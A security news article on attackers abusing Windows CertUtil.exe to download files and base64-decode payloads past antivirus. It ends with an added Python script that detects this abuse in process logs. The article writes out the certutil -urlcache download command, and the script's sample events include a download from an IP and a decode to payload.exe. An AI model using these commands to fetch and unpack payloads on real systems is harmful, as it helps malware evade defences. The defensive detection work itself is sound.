CertUtil.exe allows an attacker to download malicious code and bypass antivirus software
Windows ships with a built-in tool called CertUtil for managing certificates. With CertUtil you can install, back up, delete and manage certificates and perform other certificate-related functions in Windows.
One of CertUtil's features is downloading a certificate, or any other file, from a URL and saving it to the computer with the command certutil.exe -urlcache -split -f [URL] output.file.
In 2017, security researcher Casey Smith warned that this method could be used to download malicious code. It was already being abused in 2016, and last March a Trojan used it to download a series of files and scripts to the victim's computer.
Attackers still use CertUtil because some computers are locked down so that unknown software cannot download files. A program built into Windows is usually whitelisted and is therefore allowed to download.
CertUtil used by a recent Trojan
Using CertUtil + Base64 to bypass antivirus software
Security consultant Xavier Mertens recently described a new way to use CertUtil: the malicious file is first base64-encoded so that it is identified as harmless, then decoded with certutil.exe after it has been downloaded.
Command to download files with CertUtil:
certutil.exe -urlcache -split -f [URL] output.file
MalwareHunterTeam reports that certutil.exe -decode has been used in real attacks. F5 Labs also details a campaign that used CertUtil.exe to install a cryptocurrency miner, and Fabio Assolini from Kaspersky warned that this method has been used in Brazil.
New tricks for abusing legitimate, trusted Windows programs appear every day. If you do not use CertUtil to retrieve certificates from remote servers, you should block this tool's network connectivity.
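As an added illustration that is not part of the article, the following Python script flags the two CertUtil usages described above, the -urlcache download and the -decode step, in process-creation records. The sample events, their (image, command line) layout and the severity labels are assumptions made for this example.

```python
"""Flag abuse of certutil.exe in process-creation logs (added example)."""
import ntpath
from typing import Dict, List, Optional, Tuple

# Constructed sample records (image path, command line) in the style of
# Sysmon Event ID 1 / Windows 4688 data; not taken from any real incident.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -split -f http://198.51.100.7/update.txt output.file"),
    (r"C:\Windows\System32\certutil.exe",
     "certutil /urlcache /f https://example.invalid/a.b64 a.b64"),
    (r"C:\Windows\System32\certutil.exe", "CertUtil -Decode a.b64 payload.exe"),
    (r"C:\Windows\System32\certutil.exe", "certutil -store My"),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

URL_PREFIXES = ("http://", "https://", "ftp://")


def classify_certutil(image: str, cmdline: str) -> Optional[Dict[str, str]]:
    """Return an alert for a remote download (-urlcache with a URL) or a
    base64 -decode/-encode step; None for anything else.
    Matching on the image name misses a renamed copy of the binary; with
    Sysmon data, check the OriginalFileName field instead."""
    if ntpath.basename(image).lower() != "certutil.exe":
        return None
    tokens = cmdline.split()
    # certutil accepts both '-' and '/' as switch prefixes, case-insensitively
    switches = {t.lstrip("-/").lower() for t in tokens if t[:1] in "-/"}
    url = next((t for t in tokens if t.lower().startswith(URL_PREFIXES)), "")
    if "urlcache" in switches and url:
        technique, severity = "download", "high"
    elif switches & {"decode", "decodehex"}:
        technique, severity = "decode", "medium"
    elif switches & {"encode", "encodehex"}:
        technique, severity = "encode", "medium"
    else:
        return None  # ordinary certificate administration, e.g. -store
    return {"technique": technique, "severity": severity,
            "url": url, "cmdline": cmdline}


def scan(events: List[Tuple[str, str]]) -> List[Dict[str, str]]:
    """Run classify_certutil over every record and collect the alerts."""
    alerts = []
    for image, cmdline in events:
        alert = classify_certutil(image, cmdline)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f'[{a["severity"]}] {a["technique"]}: {a["cmdline"]}')
```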